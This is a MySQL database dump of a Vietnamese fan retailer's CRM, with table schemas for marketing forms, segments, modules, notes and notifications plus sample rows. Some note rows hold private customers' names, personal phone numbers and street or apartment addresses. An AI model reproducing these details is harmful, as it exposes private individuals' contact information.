rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/haiku.hogiaphat.vn\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaGFpa3UuaG9naWFwaGF0LnZuIiwidGFyZ2V0IjoiX2JsYW5rIn19\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Montserrat\\\",\\\"value\\\":\\\"\'Montserrat\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#fdf4ef\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":15}\"', '', 1, '2023-07-01 09:36:20');

-- --------------------------------------------------------

--
-- Table structure for table `tblma_forms`
--

CREATE TABLE `tblma_forms` (
  `id` int(11) NOT NULL,
  `form_key` varchar(32) NOT NULL,
  `lead_source` int(11) NOT NULL,
  `lead_status` int(11) NOT NULL,
  `notify_lead_imported` int(11) NOT NULL,
  `notify_type` varchar(20) DEFAULT NULL,
  `notify_ids` mediumtext DEFAULT NULL,
  `responsible` int(11) NOT NULL DEFAULT 0,
  `name` varchar(191) NOT NULL,
  `form_data` mediumtext DEFAULT NULL,
  `recaptcha` int(11) NOT NULL DEFAULT 0,
  `submit_btn_name` varchar(40) DEFAULT NULL,
  `success_submit_msg` text DEFAULT NULL,
  `language` varchar(40) DEFAULT NULL,
  `allow_duplicate` int(11) NOT NULL DEFAULT 1,
  `mark_public` int(11) NOT NULL DEFAULT 0,
  `track_duplicate_field` varchar(20) DEFAULT NULL,
  `track_duplicate_field_and` varchar(20) DEFAULT NULL,
  `create_task_on_duplicate` int(11) NOT NULL DEFAULT 0,
  `dateadded` datetime NOT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `category` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_forms`
--

INSERT INTO `tblma_forms` (`id`, `form_key`, `lead_source`, `lead_status`, `notify_lead_imported`, `notify_type`, `notify_ids`, `responsible`, `name`, `form_data`, `recaptcha`, `submit_btn_name`, `success_submit_msg`, `language`, `allow_duplicate`, `mark_public`, `track_duplicate_field`, `track_duplicate_field_and`, `create_task_on_duplicate`, `dateadded`, `addedfrom`, `category`) VALUES
(1, '2d3c55478716c8d6fab9030cec0614a7', 4, 3, 1, 'specific_staff', 'a:3:{i:0;s:1:\"1\";i:1;s:1:\"3\";i:2;s:1:\"2\";}', 1, 'Form_HamiltonAir', '[{\"type\":\"text\",\"label\":\"Tên khách hàng/Liên hệ\",\"className\":\"form-control\",\"name\":\"name\",\"subtype\":\"text\"},{\"type\":\"text\",\"subtype\":\"email\",\"required\":true,\"label\":\"Địa chỉ email\",\"className\":\"form-control\",\"name\":\"email\"},{\"type\":\"text\",\"required\":true,\"label\":\"Điện thoại\",\"className\":\"form-control\",\"name\":\"phonenumber\",\"subtype\":\"text\"},{\"type\":\"text\",\"label\":\"Công ty\",\"className\":\"form-control\",\"name\":\"company\",\"subtype\":\"text\"},{\"type\":\"textarea\",\"label\":\"Địa chỉ liên hệ\",\"className\":\"form-control\",\"name\":\"address\",\"subtype\":\"textarea\"}]', 0, 'Send to', 'Thanks. Bạn đã LƯU thành công !', 'vietnamese', 0, 1, '', '', 1, '2022-11-17 18:24:34', NULL, 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblma_lead_segments`
--

CREATE TABLE `tblma_lead_segments` (
  `id` int(11) NOT NULL,
  `segment_id` int(11) NOT NULL,
  `lead_id` int(11) NOT NULL,
  `dateadded` datetime NOT NULL,
  `deleted` int(11) NOT NULL DEFAULT 0,
  `date_delete` datetime DEFAULT NULL,
  `campaign_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_lead_stages`
--

CREATE TABLE `tblma_lead_stages` (
  `id` int(11) NOT NULL,
  `stage_id` int(11) NOT NULL,
  `lead_id` int(11) NOT NULL,
  `dateadded` datetime NOT NULL,
  `deleted` int(11) NOT NULL DEFAULT 0,
  `date_delete` datetime DEFAULT NULL,
  `campaign_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_marketing_messages`
--

CREATE TABLE `tblma_marketing_messages` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `type` text NOT NULL,
  `category` int(11) NOT NULL DEFAULT 0,
  `published` int(11) NOT NULL DEFAULT 1,
  `email_template` int(11) NOT NULL DEFAULT 0,
  `web_notification_description` text DEFAULT NULL,
  `web_notification_link` text DEFAULT NULL,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_point_actions`
--

CREATE TABLE `tblma_point_actions` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `change_points` float NOT NULL,
  `action` text DEFAULT NULL,
  `category` int(11) NOT NULL DEFAULT 0,
  `published` int(11) NOT NULL DEFAULT 1,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_point_actions`
--

INSERT INTO `tblma_point_actions` (`id`, `name`, `change_points`, `action`, `category`, `published`, `description`, `addedfrom`, `dateadded`) VALUES
(1, 'Point+', 3, 'opens_an_email', 3, 1, '', 1, '2022-11-17 18:19:40');

-- --------------------------------------------------------

--
-- Table structure for table `tblma_point_action_logs`
--

CREATE TABLE `tblma_point_action_logs` (
  `id` int(11) NOT NULL,
  `lead_id` int(11) NOT NULL,
  `campaign_id` int(11) DEFAULT NULL,
  `point_action_id` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `point` float DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_point_triggers`
--

CREATE TABLE `tblma_point_triggers` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `minimum_number_of_points` float NOT NULL,
  `contact_color` text DEFAULT NULL,
  `category` int(11) NOT NULL DEFAULT 0,
  `published` int(11) NOT NULL DEFAULT 1,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_segments`
--

CREATE TABLE `tblma_segments` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `category` int(11) DEFAULT NULL,
  `public_segment` int(11) NOT NULL DEFAULT 1,
  `published` int(11) NOT NULL DEFAULT 1,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `color` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_segments`
--

INSERT INTO `tblma_segments` (`id`, `name`, `category`, `public_segment`, `published`, `description`, `addedfrom`, `dateadded`, `color`) VALUES
(1, '20Sep_Email_Marketing', 12, 1, 1, '', 1, '2022-11-17 13:47:30', '#5707ec'),
(3, 'HamiltonAir_Segment', 12, 1, 1, '', 1, '2024-01-29 21:16:43', '');

-- --------------------------------------------------------

--
-- Table structure for table `tblma_segment_filters`
--

CREATE TABLE `tblma_segment_filters` (
  `id` int(11) NOT NULL,
  `segment_id` int(11) DEFAULT NULL,
  `type` text DEFAULT NULL,
  `sub_type_1` text DEFAULT NULL,
  `sub_type_2` text DEFAULT NULL,
  `value` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_segment_filters`
--

INSERT INTO `tblma_segment_filters` (`id`, `segment_id`, `type`, `sub_type_1`, `sub_type_2`, `value`) VALUES
(19, 1, 'tag', 'and', 'not_empty', ''),
(20, 3, 'email', 'and', 'not_empty', '');

-- --------------------------------------------------------

--
-- Table structure for table `tblma_sms`
--

CREATE TABLE `tblma_sms` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `category` int(11) NOT NULL DEFAULT 0,
  `sms_template` int(11) NOT NULL DEFAULT 0,
  `color` text DEFAULT NULL,
  `published` int(11) NOT NULL DEFAULT 1,
  `language` varchar(40) DEFAULT NULL,
  `content` text DEFAULT NULL,
  `description` longtext DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_sms_logs`
--

CREATE TABLE `tblma_sms_logs` (
  `id` int(11) NOT NULL,
  `lead_id` int(11) NOT NULL,
  `campaign_id` int(11) DEFAULT NULL,
  `text_message_id` int(11) DEFAULT NULL,
  `delivery` int(11) NOT NULL DEFAULT 0,
  `delivery_time` datetime NOT NULL,
  `dateadded` datetime NOT NULL,
  `sms_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_stages`
--

CREATE TABLE `tblma_stages` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `weight` text DEFAULT NULL,
  `category` int(11) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `color` text DEFAULT NULL,
  `published` int(11) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_stages`
--

INSERT INTO `tblma_stages` (`id`, `name`, `weight`, `category`, `description`, `addedfrom`, `dateadded`, `color`, `published`) VALUES
(1, 'Đề xuất ', '2', 11, '', 1, '2022-11-17 19:02:44', '#000000', 1),
(2, 'Email', '1', 11, '', 1, '2023-09-20 10:07:39', '', 1),
(3, 'Quote', '1', 11, '', 1, '2023-09-20 12:04:12', '#000000', 1),
(4, 'Hợp đồng', '1', 11, '', 1, '2023-09-20 12:04:21', '#000000', 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblma_text_messages`
--

CREATE TABLE `tblma_text_messages` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `category` int(11) NOT NULL DEFAULT 0,
  `published` int(11) NOT NULL DEFAULT 1,
  `language` varchar(40) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblmigrations`
--

CREATE TABLE `tblmigrations` (
  `version` bigint(20) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblmigrations`
--

INSERT INTO `tblmigrations` (`version`) VALUES
(314);

-- --------------------------------------------------------

--
-- Table structure for table `tblmilestones`
--

CREATE TABLE `tblmilestones` (
  `id` int(11) NOT NULL,
  `name` varchar(191) NOT NULL,
  `description` text DEFAULT NULL,
  `description_visible_to_customer` tinyint(1) DEFAULT 0,
  `start_date` date DEFAULT NULL,
  `due_date` date NOT NULL,
  `project_id` int(11) NOT NULL,
  `color` varchar(10) DEFAULT NULL,
  `milestone_order` int(11) NOT NULL DEFAULT 0,
  `datecreated` date NOT NULL,
  `hide_from_customer` int(11) DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblmodules`
--

CREATE TABLE `tblmodules` (
  `id` int(11) NOT NULL,
  `module_name` varchar(55) NOT NULL,
  `installed_version` varchar(11) NOT NULL,
  `active` tinyint(1) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblmodules`
--

INSERT INTO `tblmodules` (`id`, `module_name`, `installed_version`, `active`) VALUES
(1, 'backup', '2.3.0', 1),
(2, 'goals', '2.3.0', 1),
(3, 'menu_setup', '2.3.0', 1),
(4, 'theme_style', '2.3.0', 1),
(5, 'surveys', '2.3.0', 1),
(8, 'purchase', '1.2.9', 0),
(9, 'appointly', '1.2.1', 0),
(10, 'hrm', '2.3.0', 0),
(12, 'accounting', '1.1.6', 0),
(13, 'commission', '1.0.7', 0),
(14, 'api', '2.0.4', 0),
(15, 'omni_sales', '1.1.5', 0),
(16, 'loyalty', '1.0.2', 0),
(18, 'reminder', '1.0.4', 1),
(19, 'exports', '1.0.0', 1),
(20, 'ma', '1.0.0', 0),
(21, 'sales_agent', '1.0.0', 0),
(22, 'facebook_leads_integration', '1.0.0', 0),
(23, 'spreadsheet_online', '1.0.8', 1),
(25, 'custom_pdf', '1.1.2', 0),
(26, 'qrcode', '1.0.2', 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblnewsfeed_comment_likes`
--

CREATE TABLE `tblnewsfeed_comment_likes` (
  `id` int(11) NOT NULL,
  `postid` int(11) NOT NULL,
  `commentid` int(11) NOT NULL,
  `userid` int(11) NOT NULL,
  `dateliked` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblnewsfeed_posts`
--

CREATE TABLE `tblnewsfeed_posts` (
  `postid` int(11) NOT NULL,
  `creator` int(11) NOT NULL,
  `datecreated` datetime NOT NULL,
  `visibility` varchar(100) NOT NULL,
  `content` text NOT NULL,
  `pinned` int(11) NOT NULL,
  `datepinned` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblnewsfeed_posts`
--

INSERT INTO `tblnewsfeed_posts` (`postid`, `creator`, `datecreated`, `visibility`, `content`, `pinned`, `datepinned`) VALUES
(1, 1, '2021-12-29 12:58:48', 'all', 'Cập nhật sản phẩm trên kho Tổ chức đào tạo WIT quận 2', 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblnewsfeed_post_comments`
--

CREATE TABLE `tblnewsfeed_post_comments` (
  `id` int(11) NOT NULL,
  `content` text DEFAULT NULL,
  `userid` int(11) NOT NULL,
  `postid` int(11) NOT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblnewsfeed_post_likes`
--

CREATE TABLE `tblnewsfeed_post_likes` (
  `id` int(11) NOT NULL,
  `postid` int(11) NOT NULL,
  `userid` int(11) NOT NULL,
  `dateliked` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblnotes`
--

CREATE TABLE `tblnotes` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(20) NOT NULL,
  `description` text DEFAULT NULL,
  `date_contacted` datetime DEFAULT NULL,
  `addedfrom` int(11) NOT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblnotes`
--

INSERT INTO `tblnotes` (`id`, `rel_id`, `rel_type`, `description`, `date_contacted`, `addedfrom`, `dateadded`) VALUES
(4, 33, 'invoice', 'Đã tạm ứng đợt 1 ngày 23/11/2021: 14.280.000', NULL, 1, '2022-01-22 16:37:48'),
(5, 10, 'estimate', 'Lắp đặt 04 quạt trần Abacus 60 cho Ms.Kom Jemma ở A18-06 The Peak (M8), Midtown', NULL, 1, '2022-02-08 15:17:16'),
(7, 12, 'estimate', 'Lắp đặt địa chỉ: 93B Nguyễn Văn Thủ, Đakao, Quận 1, Tp HCM<br />\r\nLiên hệ anh Duy 0938677701 để hỏi người nhận hàng lắp đặt', NULL, 1, '2022-03-01 15:29:13'),
(8, 63, 'invoice', 'KH trả hàng bộ Adaptor không tương thích !', NULL, 1, '2022-03-21 08:10:19'),
(9, 70, 'invoice', 'Người nhận hàng: 0903618903 a.Thành', NULL, 1, '2022-03-24 15:34:17'),
(13, 55, 'estimate', 'Đang báo gía Tender', NULL, 1, '2022-05-04 13:51:13'),
(17, 16, 'lead', '', '2022-09-04 09:49:00', 1, '2022-09-04 09:49:42'),
(18, 16, 'lead', '', '2022-09-04 09:49:00', 1, '2022-09-04 09:50:02'),
(19, 177, 'invoice', 'Huỷ đơn hàng - Khách không mua nữa', NULL, 1, '2022-09-06 14:48:52'),
(20, 106, 'estimate', 'Thứ 6 ngày 23.09 sẳn sàng đi lắp đặt địa chỉ Chung cư, Liên hệ quản lý thi công đăng ký mới lên căn hộ', NULL, 1, '2022-09-20 13:58:32');

-- --------------------------------------------------------

--
-- Table structure for table `tblnotifications`
--

CREATE TABLE `tblnotifications` (
  `id` int(11) NOT NULL,
  `isread` int(11) NOT NULL DEFAULT 0,
  `isread_inline` tinyint(1) NOT NULL DEFAULT 0,
  `date` datetime NOT NULL,
  `description` text NOT NULL,
  `fromuserid` int(11) NOT NULL,
  `fromclientid` int(11) NOT NULL DEFAULT 0,
  `from_fullname` varchar(100) NOT NULL,
  `touserid` int(11) NOT NULL,
  `fromcompany` int(11) DEFAULT NULL,
  `link` mediumtext DEFAULT NULL,
  `additional_data` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblnotifications`
--

INSERT INTO `tblnotifications` (`id`, `isread`, `isread_inline`, `date`, `description`, `fromuserid`, `fromclientid`, `from_fullname`, `touserid`, `fromcompany`, `link`, `additional_data`) VALUES
(1, 1, 1, '2021-12-28 16:57:11', 'not_estimate_customer_accepted', 0, 0, '', 1, 1, 'estimates/list_estimates/1', 'a:1:{i:0;s:10:\"EST-000001\";}'),
(15, 1, 1, '2022-01-09 09:28:12', 'not_customer_viewed_estimate', 0, 0, '', 1, 1, 'estimates/list_estimates/1', 'a:1:{i:0;s:5:\"EST-1\";}'),
(21, 1, 1, '2022-01-09 20:35:57', 'not_customer_viewed_estimate', 0, 0, '', 1, 1, 'estimates/list_estimates/1', 'a:1:{i:0;s:5:\"EST-1\";}'),
(23, 0, 0, '2022-01-09 23:01:01', 'estimate_request_assigned_to_staff', 1, 0, 'Ho Gia Phat', 7, NULL, 'estimate_request/view/2', 'a:0:{}'),
(31, 1, 1, '2022-01-12 16:33:21', 'notify_send_approve_stock_import', 2, 0, 'Cong Ho', 1, NULL, 'warehouse/edit_purchase/2', 'a:1:{i:0;s:1:\"1\";}'),
(32, 1, 1, '2022-01-12 23:58:35', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/1', 'a:1:{i:0;s:1:\"1\";}'),
(33, 1, 1, '2022-01-13 00:06:29', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/2', 'a:1:{i:0;s:1:\"1\";}'),
(34, 1, 1, '2022-01-13 00:08:58', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/2', 'a:1:{i:0;s:1:\"1\";}'),
(35, 1, 1, '2022-01-13 00:16:38', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/3', 'a:1:{i:0;s:1:\"1\";}'),
(36, 1, 1, '2022-01-13 00:16:45', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/3', 'a:1:{i:0;s:1:\"1\";}'),
(37, 1, 1, '2022-01-14 08:39:30', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/4', 'a:1:{i:0;s:1:\"1\";}'),
(38, 1, 1, '2022-01-14 08:39:35', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/4', 'a:1:{i:0;s:1:\"1\";}'),
(39, 1, 1, '2022-01-14 13:18:14', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/1', 'a:1:{i:0;s:1:\"1\";}'),
(40, 1, 1, '2022-01-14 13:18:18', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/1', 'a:1:{i:0;s:1:\"1\";}'),
(41, 1, 1, '2022-01-14 13:22:21', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/1', 'a:1:{i:0;s:1:\"2\";}'),
(42, 1, 1, '2022-01-14 13:22:25', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/1', 'a:1:{i:0;s:1:\"2\";}'),
(47, 1, 1, '2022-01-14 16:33:58', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/2', 'a:1:{i:0;s:1:\"1\";}'),
(48, 1, 1, '2022-01-14 16:34:03', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/2', 'a:1:{i:0;s:1:\"1\";}'),
(83, 1, 1, '2022-01-21 09:48:39', 'not_task_marked_as_complete', 3, 0, 'Hieu Le', 1, NULL, '#taskid=3', 'a:1:{i:0;s:37:\"báo giá mẫu quạt trần ONIX 56\";}'),
(85, 1, 1, '2022-01-22 14:50:46', 'not_customer_viewed_proposal', 0, 0, '', 1, 1, 'proposals/list_proposals/1', 'a:1:{i:0;s:5:\"PRO-1\";}'),
(86, 1, 1, '2022-01-22 14:50:52', 'not_proposal_proposal_declined', 0, 0, '', 1, 1, 'proposals/list_proposals/1', 'a:1:{i:0;s:5:\"PRO-1\";}'),
(87, 1, 1, '2022-01-22 14:54:11', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/3', 'a:1:{i:0;s:1:\"1\";}'),
(88, 1, 1, '2022-01-22 14:54:15', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/3', 'a:1:{i:0;s:1:\"1\";}'),
(107, 1, 1, '2022-01-22 22:42:24', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/4', 'a:1:{i:0;s:1:\"1\";}'),
(108, 1, 1, '2022-01-22 22:42:28', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/4', 'a:1:{i:0;s:1:\"1\";}'),
(112, 1, 1, '2022-02-12 11:38:15', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/37', 'a:1:{i:0;s:9:\"INV-34-22\";}'),
(121, 1, 1, '2022-03-01 15:52:10', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=6', 'a:1:{i:0;s:36:\"Lắp đặt quạt SANDY 66 KOA ABS\";}'),
(125, 1, 1, '2022-03-01 15:52:15', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=6', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:36:\"Lắp đặt quạt SANDY 66 KOA ABS\";}'),
(128, 1, 1, '2022-03-07 15:04:47', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/56', 'a:1:{i:0;s:9:\"INV-53-22\";}'),
(129, 1, 1, '2022-03-08 11:21:34', 'not_staff_added_as_project_member', 3, 0, 'Tổ chức đào tạo WIT Sale', 1, NULL, 'projects/view/17', 'a:1:{i:0;s:46:\"Dự án nhà máy Sữa DenEast Bình Dương\";}'),
(130, 1, 1, '2022-03-08 11:22:05', 'not_project_file_uploaded', 3, 0, 'Tổ chức đào tạo WIT Sale', 1, NULL, 'projects/view/17?group=project_files&file_id=19', NULL),
(148, 1, 1, '2022-03-12 12:19:07', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/8', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(153, 1, 1, '2022-03-12 13:15:16', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/9', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(188, 1, 1, '2022-03-16 10:26:26', 'not_task_added_you_as_follower', 3, 0, 'Tổ chức đào tạo WIT Sale', 1, NULL, '#taskid=10', 'a:1:{i:0;s:44:\"Bảo hành quạt phát tiếng động cơ\";}'),
